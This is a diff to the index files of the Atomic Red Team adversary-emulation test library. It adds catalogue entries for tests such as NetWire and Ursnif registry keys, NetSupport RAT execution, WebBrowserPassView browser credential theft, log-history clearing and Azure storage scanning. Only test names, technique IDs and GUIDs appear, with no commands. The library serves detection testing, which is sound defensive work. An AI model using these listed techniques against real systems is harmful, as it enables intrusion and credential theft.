diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
index a8fb7301..67202121 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"11","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]}
\ No newline at end of file
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"11","navigator":"4.5.5","layer":"4.3"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 482b0528..a5f4133b 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -201,6 +201,11 @@ defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003
defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
+defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
+defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
+defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
+defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
+defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Application,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
@@ -218,6 +223,7 @@ defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666
defense-evasion,T1548.001,Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
+defense-evasion,T1218.008,Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
@@ -804,6 +810,7 @@ collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShe
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
+collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -903,6 +910,7 @@ credential-access,T1555.003,Credentials from Web Browsers,11,WinPwn - BrowserPwn
credential-access,T1555.003,Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
credential-access,T1555.003,Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
+credential-access,T1555.003,Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
@@ -1073,6 +1081,7 @@ discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bca
discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
+discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET,fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4,command_prompt
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS,1ca1f9c7-44bc-46bb-8c85-c50e2e94267b,sh
@@ -1155,7 +1164,7 @@ discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
-discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Discovery,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Discovery,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
@@ -1185,6 +1194,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index ffb5b9a9..30c20e03 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -96,6 +96,7 @@ collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28f
collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1530,Data from Cloud Storage Object,1,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
+collection,T1530,Data from Cloud Storage Object,2,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
@@ -217,6 +218,7 @@ discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
+discovery,T1082,System Information Discovery,23,Azure Security Scan with SkyArk,26a18d3d-f8bc-486b-9a33-d6df5d78a594,powershell
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
@@ -234,7 +236,7 @@ discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db26
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
-discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1090.003,Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 29aec657..47b6fb25 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -156,7 +156,7 @@ discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7f
discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
-discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,sh
+discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 6967ae8f..21d5d5fd 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -151,6 +151,11 @@ defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003
defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
+defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
+defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
+defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
+defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
+defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Application,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
defense-evasion,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
@@ -159,6 +164,7 @@ defense-evasion,T1070.001,Clear Windows Event Logs,3,Clear Event Logs via VBA,1b
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
+defense-evasion,T1218.008,Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
@@ -647,6 +653,7 @@ credential-access,T1555.003,Credentials from Web Browsers,10,Stage Popular Crede
credential-access,T1555.003,Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
credential-access,T1555.003,Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
credential-access,T1555.003,Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
+credential-access,T1555.003,Credentials from Web Browsers,15,WebBrowserPassView - Credentials from Browser,e359627f-2d90-4320-ba5e-b0f878155bbe,powershell
credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
@@ -860,6 +867,7 @@ command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Tes
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
+command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 46af6a54..e6349fca 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -276,6 +276,11 @@
- Atomic Test #36: Disable Windows Security Center Notifications [windows]
- Atomic Test #37: Suppress Win Defender Notifications [windows]
- Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
+ - Atomic Test #39: NetWire RAT Registry Key Creation [windows]
+ - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
+ - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
+ - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
+ - Atomic Test #43: DisallowRun Execution Of Certain Application [windows]
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
@@ -310,6 +315,7 @@
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #2: Odbcconf.exe - Load Response File [windows]
- T1144 Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1388,6 +1394,7 @@
- Atomic Test #4: Collect Clipboard Data via VBA [windows]
- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
+ - Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
@@ -1575,6 +1582,7 @@
- Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
- Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
- Atomic Test #14: Simulating Access to Chrome Login Data - MacOS [macos]
+ - Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
@@ -1804,6 +1812,7 @@
- Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
- Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
- Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
+ - Atomic Test #23: Azure Security Scan with SkyArk [azure-ad]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1995,6 +2004,7 @@
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
+ - Atomic Test #8: NetSupport - RAT Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index c396351c..78ace394 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -224,6 +224,7 @@
- T1115 Clipboard Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1530 Data from Cloud Storage Object](../../T1530/T1530.md)
- Atomic Test #1: Azure - Enumerate Azure Blobs with MicroBurst [iaas:azure]
+ - Atomic Test #2: Azure - Scan for Anonymous Access to Azure Storage (Powershell) [iaas:azure]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
@@ -556,6 +557,7 @@
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
+ - Atomic Test #23: Azure Security Scan with SkyArk [azure-ad]
- T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 8d45c717..7b343754 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -209,6 +209,11 @@
- Atomic Test #36: Disable Windows Security Center Notifications [windows]
- Atomic Test #37: Suppress Win Defender Notifications [windows]
- Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
+ - Atomic Test #39: NetWire RAT Registry Key Creation [windows]
+ - Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
+ - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
+ - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
+ - Atomic Test #43: DisallowRun Execution Of Certain Application [windows]
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.001 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
